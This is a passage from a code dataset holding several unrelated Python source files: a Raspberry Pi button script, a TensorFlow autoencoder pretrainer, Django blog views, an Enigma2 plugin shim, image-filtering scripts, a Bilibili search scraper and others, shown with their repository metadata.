subprocess.Popen([\"sudo\", \"systemctl\", \"restart\", \"lightdm.service\"], shell=False) \n print(\"Killed\")\n #subprocess.Popen([\"sudo\", \"mpg123\", \"/home/pi/PiGlassv2/killing.mp3\"], shell=False)\n kill.play()\n kill = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/kill.mp3\")\n time.sleep(3)\n subprocess.Popen(['sudo', 'killall', \"raspivid\", \"ffmpeg\", \"steamlink\", 'kodi.bin_v7', 'retroarch', 'emulationstatio', 'python3'], shell=False)\n print(\"Button was pushed!\")\n\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BCM) # Use physical pin numbering\nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Set pin 10 to be an input pin and set initial value to be pulled low (off)\n\nGPIO.add_event_detect(17,GPIO.RISING,callback=button_callback, bouncetime=3000) # Setup event on pin 10 rising edge\n\n#message = input(\"Press enter to quit\\n\\n\") # Run until someone presses enter\n\nwhile True:\n time.sleep(.5)\n\n\nGPIO.cleanup() # Clean up\n","repo_name":"matt-desmarais/PiGlassv2","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"41904006899","text":"#from utils import *\nimport pickle\nimport tensorflow as tf\nimport numpy as np\n\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, leak * x)\n\nclass SingleAE(object):\n def __init__(self, shape, para, data, layer_idx, activation_fun1, activation_fun2):\n self.para = para\n self.data = data\n self.layer_idx = layer_idx\n\n self.x = tf.placeholder(tf.float32, [None, shape[0]])\n self.dropout = tf.placeholder(tf.float32)\n self.lr = tf.placeholder(tf.float32)\n\n self.var_list = []\n with tf.variable_scope('SAE') as scope:\n stddev = 1.0 / np.sqrt(shape[0])\n self.x_c = tf.nn.dropout(self.x, self.dropout)\n self.W1 = tf.Variable(tf.random_normal([shape[0], shape[1]], stddev=stddev), name=\"W1\")\n self.b1 = tf.Variable(tf.zeros([shape[1]], name='b1'))\n self.h = tf.add(tf.matmul(self.x_c, self.W1), self.b1)\n if activation_fun1 != None:\n self.h = activation_fun1(self.h)\n self.h = tf.nn.dropout(self.h, self.dropout)\n\n stddev = 1.0 / np.sqrt(shape[1])\n self.W2 = tf.Variable(tf.random_normal([shape[1], shape[0]], stddev=stddev), name='W2')\n self.b2 = tf.Variable(tf.zeros([shape[0]], name='b2'))\n self.x_hat = tf.add(tf.matmul(self.h, self.W2), self.b2)\n if activation_fun2 != None:\n self.x_hat = activation_fun2(self.x_hat)\n\n self.var_list.extend([self.W1, self.b1, self.W2, self.b2])\n\n self.loss = tf.reduce_mean(tf.square(self.x - self.x_hat))\n self.opt = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(loss=self.loss, var_list=self.var_list)\n\n gpu_config = tf.ConfigProto()\n gpu_config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=gpu_config)\n self.sess.run(tf.global_variables_initializer())\n\n def doTrain(self):\n num_samples = len(self.data)\n lr = self.para['lr']\n\n for i in range(self.para['iters']):\n batch_indices = np.random.randint(num_samples, size=self.para['batch_size'])\n batch_x = self.data[batch_indices,:]\n self.sess.run(self.opt, feed_dict={self.x: batch_x, self.dropout: self.para['dropout'], self.lr: lr})\n\n if i % 1000 == 0:\n error = self.sess.run(self.loss, feed_dict={self.x: self.data, self.dropout: 1.0})\n print('pretrain layer-{}, epoch-{}: {}'.format(self.layer_idx, i, error))\n\n if i % 20000 == 0:\n lr /= 10.0\n \n def getWb(self):\n return self.sess.run([self.W1, self.b1, self.W2, self.b2])\n\n def getH(self):\n return self.sess.run(self.h, feed_dict={self.x: self.data, self.dropout: 1.0})\n\n def close(self):\n return self.sess.close()\n \nclass PreTrainer(object):\n\n def __init__(self, config):\n self.config = config\n self.rel_input_dim = config['rel_input_dim']\n self.att_input_dim = config['att_input_dim']\n self.rel_shape = config['rel_shape']\n self.att_shape = config['att_shape']\n self.pretrain_params_path = config['pretrain_params_path']\n\n self.W_init = {}\n self.b_init = {}\n\n\n def pretrain(self, data, modal):\n\n if modal == 'rel':\n shape = [self.rel_input_dim] + self.rel_shape\n elif modal == 'att':\n shape = [self.att_input_dim] + self.att_shape\n\n for i in range(len(shape) - 1):\n print (shape[i], shape[i+1])\n\n\n activation_fun1 = lrelu\n activation_fun2 = lrelu\n if i == 0:\n activation_fun2 = tf.nn.sigmoid\n if modal == 'att':\n activation_fun2 = None\n if i == len(shape) - 2:\n activation_fun1 = None\n\n\n SAE = SingleAE([shape[i], shape[i + 1]],\n {\"iters\": 50000, \"batch_size\": 256, \"lr\": 1e-3, \"dropout\": 0.8}, data,\n i, activation_fun1, activation_fun2)\n SAE.doTrain()\n W1, b1, W2, b2 = SAE.getWb()\n\n name = modal + \"_encoder\" + str(i)\n self.W_init[name] = W1\n self.b_init[name] = b1\n name = modal + \"_decoder\" + str(len(shape) - i - 2)\n self.W_init[name] = W2\n self.b_init[name] = b2\n\n data = SAE.getH()\n\n with open(self.pretrain_params_path, 'wb') as handle:\n pickle.dump([self.W_init, self.b_init], handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n","repo_name":"CangtianM/FATNet","sub_path":"FATNet/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13980176878","text":"# -*- coding: utf-8 -*-\n# emulation of IMDb plugin for calling CSFD plugin because not all plugins can call CSFD directly\n# CSFD is Czech and Slovak Movie Database\n\nfrom Plugins.Plugin import PluginDescriptor\t # @UnusedImport\nfrom Screens.Screen import Screen\nfrom Components.ActionMap import ActionMap\nfrom Components.Button import Button\nimport traceback\n\nclass IMDB(Screen):\n\tskin = \"\"\"\n\t\t\n\t\t\t\n\t\t\"\"\"\n\n\tdef __init__(self, session, eventName, callbackNeeded=False):\n\t\tScreen.__init__(self, session)\n\t\tself.session = session\n\t\tself.eventName = eventName\n\t\tself.callbackNeeded = callbackNeeded\n\t\tself.ret = None\n\t\tself[\"key_red\"] = Button(\"\")\n\t\tself[\"actions\"] = ActionMap([\"IMDBemu\"],\n\t\t{\n\t\t\t\"cancel\": self.exit\n\t\t}, -1)\n\t\tself.onShown.append(self.CSFDemu)\n\n\tdef CSFDemu(self):\n\t\ttry:\n\t\t\tfrom Plugins.Extensions.CSFD.plugin import CallCSFD\t # @UnresolvedImport\n\t\t\tself.ret = CallCSFD(session=self.session, eventName=self.eventName, callbackNeeded=self.callbackNeeded)\n\t\texcept:\n\t\t\tprint(\"IMDB emulator for CSFD - error\")\n\t\t\terr = traceback.format_exc()\n\t\t\tprint(err)\n\t\t\tpass\n\t\tself.exit()\n\n\tdef exit(self):\n\t\tif self.callbackNeeded:\n\t\t\tself.close(self.ret)\n\t\telse:\n\t\t\tself.close()\n\ndef Plugins(**kwargs):\n\treturn []\n","repo_name":"skyjet18/enigma2-plugin-extensions-csfd","sub_path":"IMDb/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"74612187768","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals,print_function\nfrom django.urls import reverse\nfrom django.http import HttpResponse,HttpResponseRedirect,JsonResponse,HttpResponseNotFound\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files import File\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nimport os\nimport shutil\nfrom app_blog.models import PostClass,Post,APP_FILE_ROOT,APP_TEMPLETE_ROOT\n\n\n# 博客首页\n# /blog\ndef blog(request):\n if request.method == 'GET':\n post_classes = PostClass.objects.all()\n active = request.GET.get('active',None)\n if active is None: # 按分类展示\n active = post_classes[0].name\n return HttpResponseRedirect(reverse('app_blog')+'?active='+active)\n active_post_class = PostClass.objects.filter(name=active)[0]\n posts = Post.objects.filter(post_class__name=active).order_by(\"publish_time\")\n for post in posts:\n tmp_keywords = []\n if str(post.keywords):\n for keyword in str(post.keywords).split(';'):\n tmp_keywords.append(keyword)\n post.keywords = tmp_keywords\n else:\n post.keywords = []\n return HttpResponse(render(request, APP_TEMPLETE_ROOT+'index.html', {\\\n 'title':'博客',\\\n 'active':active,\\\n 'active_post_class':active_post_class,\\\n 'left_list':post_classes,\\\n 'content_list':posts,\\\n }))\n elif request.method == 'POST':\n purpose = request.POST.get('purpose',None)\n if purpose == 'new' and request.user.is_authenticated:\n try:\n #表单提交处理:新建文档,对文件主体的操作转到编辑器页面进行\n user = User.objects.filter(username=request.user.username)[0]\n post_class_id = request.POST.get('postclass',None)\n post_class = PostClass.objects.get(id=int(post_class_id))\n new_title = request.POST.get('title',None)\n new_keywords = request.POST.get('keywords',None)\n new_description = request.POST.get('description',None)\n new_post = Post.objects.create(post_class=post_class,user=user,title=new_title,keywords=new_keywords,description=new_description)\n new_post.save()\n new_post_id = new_post.id\n upload_file = request.FILES.get('file',None)\n new_postfile = upload_file\n if upload_file is None:\n f = open(APP_FILE_ROOT+str(new_post_id)+'.md','w+')\n new_postfile = File(f)\n new_postfile.write('')\n new_postfile.name = str(new_post_id)+'.md'\n new_post.content = new_postfile\n new_post.save()\n f.close()\n os.remove(APP_FILE_ROOT+str(new_post_id)+'.md')\n else:\n new_postfile.name = str(new_post_id)+'.md'\n new_post.content = new_postfile\n new_post.save()\n return HttpResponseRedirect(reverse('app_blog_editmd')+'?path=blog/post/'+str(new_post_id)+'&name='+str(new_post_id)+'.md'+'&title='+new_title)\n except:\n messages.error(request,'操作失败!')\n return HttpResponseRedirect(request.path)\n\n\n# 编辑器页。可直接访问,也可通过iframe嵌入。新建文档、编辑文档的实际执行者\n# /blog/editmd\ndef editmd(request):\n if request.method == 'GET':\n #返回编辑器页面\n arg_path = request.GET.get('path', None)\n arg_name = request.GET.get('name', None)\n html_name = arg_name.split('.')[0]+'.html'\n arg_title = request.GET.get('title',None)\n try:\n return HttpResponse(render(request,'common/editmd.html',{\\\n 'path': arg_path,\\\n 'name': arg_name,\\\n 'html_name': html_name,\\\n 'title':arg_title,\\\n }))\n except:\n messages.error(request,'无效文档信息!')\n return HttpResponseRedirect(reverse('app_blog')+'post/')\n\n\n# 文章页\n# 不显示左侧,内容+右侧信息\n# /blog/post/postid\ndef post(request, post_id):\n #GET直接请求网页\n if request.method == 'GET':\n post_classes = PostClass.objects.all()\n content_post = []\n #1.尝试读取选定的文章\n try:\n content_post = Post.objects.filter(id=post_id)[0]\n except:\n html_404 = '

Not Found

The requested URL %s was not found on this server.

' %request.path\n return HttpResponseNotFound(html_404)\n #2.尝试读取文档对应的文件,若没有则默认为空\n content_post_file = ''\n try:\n content_post_file = content_post.content.read()\n except:\n pass\n return HttpResponse(render(request, 'app_blog/post.html',{\\\n 'title':content_post.title,\\\n 'left_list':post_classes,\\\n 'content_post':content_post,\\\n 'content_post_file':content_post_file,\\\n }))\n #POST操作文档域\n elif request.method == 'POST':\n purpose = request.POST.get('purpose',None)\n content_post = Post.objects.filter(id=post_id)[0]\n if purpose is not None and request.user.is_authenticated and request.user.username == content_post.user.username:\n try:\n #表单提交处理:修改当前文档,对文件主体的操作转到编辑器页面进行\n if purpose == 'edit':\n new_title = request.POST.get('title',None)\n new_keywords = request.POST.get('keywords',None)\n new_description = request.POST.get('description',None)\n content_post.title=new_title #更新数据直接赋值即可\n content_post.keywords=new_keywords\n content_post.description=new_description\n content_post.save()\n return HttpResponseRedirect(reverse('app_blog_editmd')+'?path=blog/post/'+str(post_id)+'&name='+str(post_id)+'.md'+'&title='+new_title)\n #表单提交处理:删除当前文档及其文件目录,成功后返回到栏目页\n elif purpose == 'delete':\n content_post.delete()\n shutil.rmtree(APP_FILE_ROOT+str(post_id))\n return HttpResponseRedirect(reverse('app_blog'))\n # 表单提交处理:由editmd提交,保存修改,保存完成后仍然留在editmd页面\n elif purpose == 'save':\n arg_path = request.POST.get('path', None)\n arg_id = arg_path.split('/')[-1]\n text_md = request.POST.get('editormd-markdown-textarea', None)\n text_html = request.POST.get('editormd-html-textarea', None)\n\n # md file\n f1 = open(APP_FILE_ROOT + str(arg_id) + '.md', 'w+') # 在文件系统中打开临时文件暂存\n new_docfile = File(f1)\n new_docfile.write(text_md)\n new_docfile.name = str(arg_id) + '.md'\n content_post.content.delete() # 必须先删除旧文件再保存,否则django会自动另存为新文件并添加随机后缀\n content_post.content = new_docfile\n\n # html file\n f2 = open(APP_FILE_ROOT + str(arg_id) + '.html', 'w+') # 在文件系统中打开临时文件暂存\n new_docfile_html = File(f2)\n new_docfile_html.write(text_html)\n new_docfile_html.name = str(arg_id) + '.html'\n if content_post.content_html is not None:\n content_post.content_html.delete() # 必须先删除旧文件再保存,否则django会自动另存为新文件并添加随机后缀\n content_post.content_html = new_docfile_html\n\n content_post.save()\n f1.close()\n f2.close()\n os.remove(APP_FILE_ROOT + str(arg_id) + '.md') # 删除临时文件\n os.remove(APP_FILE_ROOT + str(arg_id) + '.html') # 删除临时文件\n return HttpResponse(str(arg_id) + \".md:保存成功!\")\n except:\n messages.error(request,'操作失败!')\n return HttpResponseRedirect(request.path)\n\n\n# 在editmd页面里的导出文件操作,无对应模板\n# /blog/post/postid/postname\ndef filed(request,post_id,post_name):\n if post_id is not None and post_name is not None:\n #返回文档实体文件.html内容。此处的GET参数由前端生成,需要编解码\n if post_name.split('.')[1] == 'md':\n post = Post.objects.get(id=post_id)\n response = HttpResponse(post.content)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=' + post_name\n return response\n #返回文档实体文件.md内容。此处的GET参数由前端生成,需要编解码\n elif post_name.split('.')[1] == 'html':\n post = Post.objects.get(id=post_id)\n response = HttpResponse(post.content_html)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=' + post_name\n return response\n else:\n return HttpResponse('None')\n\n\n# 图片操作,无对应模板\n# /blog/post/postid/image\n# /blog/post/postid/image/imagename\n@csrf_exempt #插件的模板无法添加POST{% csrf_token %},需要对此视图函数使用此装饰器\ndef image(request,post_id,image_name):\n if post_id is not None:\n #在editmd页面里的图片上传处理\n if request.method == 'POST' and request.user.is_authenticated:\n try:\n upload_image = request.FILES.get('editormd-image-file',None)\n with open(APP_FILE_ROOT+str(post_id)+'/'+str(upload_image.name),'wb+') as f:\n f.write(upload_image.read())\n return JsonResponse({\\\n \"success\":1,\\\n \"message\":\"success\",\\\n \"url\":'http://'+request.get_host()+request.path +'/'+str(upload_image.name)\\\n })#get_host()获取域名,path获取去掉域名的相对网址\n except:\n return JsonResponse({\\\n \"success\":0,\\\n \"message\":\"上传失败!\",\\\n \"url\":\"null\"\\\n })\n #图片链接\n elif request.method == 'GET':\n if image_name is not None:\n with open(APP_FILE_ROOT+str(post_id)+'/'+str(image_name), 'rb') as f:\n image = f.read()\n response = HttpResponse(image)\n response['Content-Type'] = 'image/' + image_name.split('.')[-1]\n return response\n else:\n return HttpResponse('')\n","repo_name":"yanyaming/yxf_mysite_py_django","sub_path":"mysite/app_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32808958193","text":"# https://leetcode.com/explore/challenge/card/june-leetcoding-challenge/541/week-3-june-15th-june-21st/3367/\n\nclass Solution:\n def calculateMinimumHP(self, dungeon: List[List[int]]) -> int:\n r, c = len(dungeon), len(dungeon[0])\n dp = [[float('inf') for _ in range(c)] for _ in range(r)]\n ans = [[0 for _ in range(c)] for _ in range(r)]\n dp[0][0] = ans[0][0] + dungeon[0][0]\n for i in range(1, r):\n dp[i][0] = ans[i][0] + dungeon[i][0] \n for j in range(1, c):\n dp[0][j] = ans[0][j] + dungeon[0][j]\n for i in reversed(range(r)):\n for j in reversed(range(c)):\n if i+1 >= r and j+1 >=c:\n dp[i][j] = float('inf')\n elif i+1 >= r:\n dp[i][j] = max(1, dp[i][j+1] - dungeon[i][j])\n elif j+1 >=c:\n dp[i][j] = max(1, dp[i+1][j] - dungeon[i][j])\n else:\n dp[i][j] = min(max(1, dp[i+1][j] - dungeon[i][j]), max(1, dp[i][j+1] - dungeon[i][j]))\n if dp[i][j] == float('inf'):\n dp[i][j] = max(1, 1-dungeon[i][j])\n return dp[0][0]\n","repo_name":"rmodi6/scripts","sub_path":"practice/Leetcode/3367_dungeon_game.py","file_name":"3367_dungeon_game.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11924989931","text":"from osv import osv\nfrom osv import fields\nimport re\n\n\nclass email_server_mapping_field(osv.osv):\n _name = 'email.server.mapping.field'\n _description = 'Variable to field mapping'\n _order = 'field_id, sequence, id'\n\n _columns = {\n 'email_server_id': fields.many2one('email.server', 'Email server', help='Email server configuration'),\n 'field_id': fields.many2one('ir.model.fields', 'Field', required=True, help='The model\\'s field on which the variable value will be written, if found'),\n 'pattern': fields.char('Pattern', size=128, required=True, help='Pattern which will be sarched for to find the field\\'s value.\\nPut (.*?) for the variable part.\\nExample : [[phone:(.*?)]].\\nIn case of full content, put only (.*), without the question mark.'),\n 'message_part': fields.selection([\n ('body', 'Body'),\n ('subject', 'Subject'),\n ('to', 'To'),\n ('cc', 'CC'),\n ('from', 'From'),\n ('reply-to', 'Reply to'),\n ('in-reply-to', 'In reply to'),\n ('date', 'Date'),\n ('references', 'References'),\n ], 'Message Part', required=True, help='This field defines the part of the email where the data will be searched for'),\n 'sequence': fields.integer('Sequence', help='Will concatenate fields contents ordered by sequence'),\n\n }\n\n _defaults = {\n 'pattern': '[[Field identifier:(.*?)]]',\n 'message_part': 'body',\n 'sequence': 1,\n }\n\nemail_server_mapping_field()\n\n\nclass email_server(osv.osv):\n _inherit = 'email.server'\n\n _columns = {\n 'mapping_field_ids': fields.one2many('email.server.mapping.field', 'email_server_id', 'Mapping fields', help='Allow to map fields with custom variables in email body'),\n }\n\n def list_mapping_fields(self, cr, uid, ids, context=None):\n \"\"\"\n Generates a list of patterns to fetch specific fields from message body\n \"\"\"\n mapping_fields_data = {}\n\n for email_server in self.browse(cr, uid, ids, context=context):\n mapping_fields_data[email_server.id] = []\n # Generates a list of patterns, format : [(field_name, pattern)]\n for mapping_field in email_server.mapping_field_ids:\n # Escape all regex special characters but (.*?) from pattern\n mapping_fields_data[email_server.id].append((mapping_field.field_id.name, mapping_field.message_part, re.sub('([[\\^$|+])', '\\\\\\\\\\\\1', mapping_field.pattern)))\n\n return mapping_fields_data\n\n def fetch_mail(self, cr, uid, ids, context=None):\n \"\"\"\n Redefine the fetch_mail method to add custm parameters\n \"\"\"\n if context is None:\n context = {}\n\n for server in self.browse(cr, uid, ids, context=context):\n # Add patterns in context\n context['mapping_fields'] = server.list_mapping_fields(context=context)[server.id]\n\n # Call to super for standard behaviour\n super(email_server, self).fetch_mail(cr, uid, [server.id], context=context)\n\n # Destroy value, it must not be reused automatically for the next mail\n del(context['mapping_fields'])\n\nemail_server()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"subteno-it/fetchmail_parsing","sub_path":"fetchmail.py","file_name":"fetchmail.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28991630302","text":"import sys\nfrom query_module import Query_search, query_main\nfrom robot_explore import explore\nfrom robot_decision import robot_work_cal\nimport time\nimport zmq\nimport csv\nfrom config import Input_csv_path, Robot_self_name, Time_store_file_path\n\n#########################################\n\ndef robo_time_write_csv(file_path, myData):\n print(\"----writing data to csv file------\")\n myFile = open(file_path, 'ab')\n with myFile:\n writer = csv.writer(myFile)\n writer.writerows(myData)\n\n#############################################################\n\ndef csv_reader(file_obj):\n\n reader = csv.reader(file_obj)\n task_queue = []\n num = 0\n\n for row in reader:\n if (num != 0):\n task_queue.append(row[1])\n num = num +1\n\n return task_queue\n\n#################################################################\n\ndef controller(robot_input, start_time):\n\n print (' ------ Robot input------ ', robot_input)\n query_res = Query_search(robot_input) ##### query - 1\n product = []\n robots = []\n\n if (query_res == False):\n print ('--- robot start exploration -----')\n explore_res = explore(robot_input) ##### query - 2\n\n if (explore_res == False):\n print (\" ------ no object found of that kind ----- \")\n\n\n else:\n print (\"---- Again searching for the details of object in the warehouse -----\")\n search_2 = Query_search(robot_input) ##### query - 3\n\n if (search_2 == False):\n print (\"---- Object not found ------\")\n\n\n else:\n time.sleep(10)\n product, robots = query_main(robot_input) ##### query - 4\n\n else:\n print ('------ result output -------------')\n product, robots = query_main(robot_input) ##### query - 2\n\n ###################################################################################\n robot_query_end_time = time.time()\n #######################################\n robot_decision_start_time = time.time()\n\n if (robots == None):\n des_end_time = time.time()\n print (\"----- Nothing found no task can be executed -------\")\n\n\n else:\n print (\"---- decising the task -----\")\n exe_res, start_time, query_end_time, decision_start_time, des_end_time = robot_work_cal(product, robots, robot_input, start_time, robot_query_end_time, robot_decision_start_time)\n\n if (exe_res == True):\n print (\"--------object will be delivered at destination--------\")\n\n else:\n print (\"------object fail to deliver at the destination------\")\n\n ###########################\n\n net_time = [[robot_input, Robot_self_name, start_time, query_end_time, decision_start_time, des_end_time]]\n robo_time_write_csv(Time_store_file_path, net_time)\n\n\n#############################\n\nif __name__ == '__main__':\n\n######################################################\n\n csv_path = Input_csv_path\n task_queue = []\n\n with open(csv_path, \"rb\") as f_obj:\n task_queue = csv_reader(f_obj)\n\n for i in range(0, len(task_queue), 1):\n task_main = task_queue[i]\n print (\"-------Starting a New Task ---------\")\n task_start_time = time.time()\n controller(str(task_main), task_start_time)\n\n\n#########################################################","repo_name":"papan1993/Projects","sub_path":"Distributed_Robot_System/robot_system/main_controller.py","file_name":"main_controller.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74660975608","text":"\"\"\"empty message\n\nRevision ID: fc2eeba8e8e8\nRevises: ae7809eb2557\nCreate Date: 2020-02-06 18:17:11.218770\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fc2eeba8e8e8'\ndown_revision = 'ae7809eb2557'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('credit_transfer', sa.Column('exclude_from_limit_calcs', sa.Boolean(), nullable=True))\n op.add_column('kyc_application', sa.Column('multiple_documents_verified', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('kyc_application', 'multiple_documents_verified')\n op.drop_column('credit_transfer', 'exclude_from_limit_calcs')\n # ### end Alembic commands ###\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/migrations/versions/fc2eeba8e8e8_.py","file_name":"fc2eeba8e8e8_.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"29062823911","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\ndef filter(k, img):\r\n m = int(np.floor(len(k) / 2))\r\n n = int(np.floor(len(list(zip(*k)))) / 2)\r\n rows, cols = img.shape # no of rows and cols\r\n filtered_img = np.zeros((rows, cols), np.uint8) # new integer image is created\r\n for i in range(m, rows - m):\r\n for j in range(n, cols - n):\r\n sum = 0\r\n for x in range(-m, m + 1, 1):\r\n for y in range(-n, n + 1, 1):\r\n sum = sum + (img[i + x, j + y] * k[m + x][n + y]) # sum of product of kernal elements with corresponding image elements\r\n filtered_img[i, j] = abs(sum)\r\n return filtered_img\r\n\r\nfilepath=\"Ch3-images/goggles.jpg\"\r\nimg = cv.imread(filepath,0)\r\nk1 = [[0, 1, 0], [1, -4, 1], [0, 1, 0]]\r\nk2= [[0, -1, 0], [-1, 4, -1], [0, -1, 0]]\r\nk3 = [[1, 1, 1], [1, -8, 1], [1, 1, 1]]\r\nk4= [[-1, -1, -1], [-1,8, -1], [-1, -1, -1]]\r\n\r\nimg1 = filter(k1, img)\r\nimg2 = filter(k2, img)\r\nimg3 = filter(k3, img)\r\nimg4 = filter(k4, img)\r\nimgs=np.hstack((img,img1, img2, img3, img4))\r\ncv.imshow(\"A)Original image B)Laplacian1 C)Laplacian2 D)Laplacian3 E)Laplacian4\",imgs)\r\ncv.waitKey(0)","repo_name":"supriyo1598/DIP_PRACTICAL_OPENCV","sub_path":"P-3-36-LaplacianKernals.py","file_name":"P-3-36-LaplacianKernals.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"28948068558","text":"# 搜索模块\nimport requests\nimport json\nimport re\n\n\n# duration : 时长\n# title : 视频标题\n# author : 作者\n# tag : 标签\n# arcurl : 地址\nclass Search:\n keyword = ''\n result_list = []\n display_list = [] # 拿给窗口显示用的\n\n def __init__(self, keyword: str):\n if keyword != '':\n self.keyword = keyword\n self.result_list = self.search_video(keyword=keyword) # 获得搜索结果\n self.get_display_style()\n\n def get_url(self, order: int):\n # 通过序号获得url\n return self.result_list[order]['arcurl']\n\n def get_display_style(self):\n # 获得给窗口显示用的结果列表\n for res in self.result_list:\n # 标题 作者 时长 标签\n dis = res['title'] + ' ' + res['author'] + ' ' + res['duration'] + ' ' + res['tag']\n self.display_list.append(dis)\n\n def search_video(self, keyword):\n headers_ = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32',\n 'referer': 'https://www.bilibili.com',\n }\n\n url = 'https://api.bilibili.com/x/web-interface/search/type?__refresh__=true&_extra=&context=&page=1&page_size=50&from_source=&from_spmid=333.337&platform=pc&highlight=1&single_column=0&keyword=' + keyword + '&category_id=&search_type=video&dynamic_offset=0&preload=true&com2co=true'\n\n page_text = requests.get(url=url, headers=headers_).text\n data_dict = json.loads(page_text)\n result_list = data_dict['data']['result'] # 获得结果的列表\n # 将结果中的标题格式化\n for result in result_list:\n result['title'] = self.get_tit(result['title'])\n\n return result_list # 返回搜索到的列表\n\n # def search_person(name:str):\n\n # def person_videos(id:str):\n #\n\n def get_tit(self, resp: str):\n rule = r'(.*?)(.*?)(.*?)'\n\n try:\n tit_list = re.findall(rule, resp)[0]\n\n result_ = ''\n for tit in tit_list:\n result_ = result_ + tit\n return result_\n except:\n return resp\n\n# if __name__ == '__main__':\n# se = search('新宝岛')\n# print(se.result_list[0]['arcurl'])\n","repo_name":"MemoryController/bilibili-","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2584836534","text":"# Lê Bảo Khương - 20146123\r\n\r\nimport cv2 #opencv để xử lí ảnh\r\nimport numpy as np #tính toán ma trận\r\nfrom PIL import Image\r\nimport math\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n# các hàm con\r\n# def < tên hàm con > ( thông tin input )\r\n\r\ndef shp(imgPIL):\r\n \r\n # tạo 1 khung ảnh để chứa bitmap sau khi làm mượt\r\n sharp= Image.new(imgPIL.mode, imgPIL.size)\r\n \r\n # tạo ma trận thay thế hệ số c = -1 \r\n alterMatrix= np.array([[0,-1,0],[-1,4,-1],[0,-1,0]])\r\n \r\n # lấy kích thước ảnh\r\n w= imgPIL.size[0] \r\n h= imgPIL.size[1] \r\n \r\n # nhân ma trận thay thế thay vì tính laplacian\r\n for x in range (1,w-1): \r\n for y in range (1,h-1):\r\n \r\n rs= 0\r\n gs= 0\r\n bs= 0\r\n \r\n sr= 0\r\n sg= 0\r\n sb= 0\r\n \r\n # quét các điểm trong mặt nạ\r\n for i in range (x-1,x+2):\r\n for j in range (y-1,y+2):\r\n \r\n # giá trị điểm ảnh tại từng pixel\r\n R , G , B = imgPIL.getpixel((i,j))\r\n \r\n # cộng dồn giá trị\r\n rs+= R*alterMatrix[i-x+1,j-y+1]\r\n gs+= G*alterMatrix[i-x+1,j-y+1]\r\n bs+= B*alterMatrix[i-x+1,j-y+1]\r\n \r\n # tính f(x,y)\r\n R1, G1, B1= imgPIL.getpixel((x,y)) \r\n \r\n sr= R1 + rs\r\n sg= G1 + gs\r\n sb= B1 + bs\r\n\r\n if (sr<0):\r\n sr= 0\r\n elif (sr> 255):\r\n sr= 255\r\n \r\n if (sg<0):\r\n sg= 0\r\n elif (sg> 255):\r\n sg= 255\r\n \r\n if (sb<0):\r\n sb= 0\r\n elif (sb> 255):\r\n sb= 255\r\n \r\n sharp.putpixel((x,y),(sb,sg,sr))\r\n \r\n return sharp\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n# main\r\n\r\n# mở file hình = đường dẫn\r\n#filehinh= r'astley.png'\r\nfilehinh= r'bird_small.jpg'\r\nimg= cv2.imread(filehinh,cv2.IMREAD_COLOR) \r\n\r\n# đọc ảnh = pillow\r\nimgPIL= Image.open(filehinh)\r\n\r\n# làm sắc nét ảnh\r\nshp3= shp(imgPIL) \r\n\r\n# chuyển ảnh từ pillow -> opencv\r\nshp3cv= np.array(shp3)\r\n\r\ncv2.imshow('Original',img)\r\ncv2.imshow('3x3',shp3cv)\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n#esc = phím bất 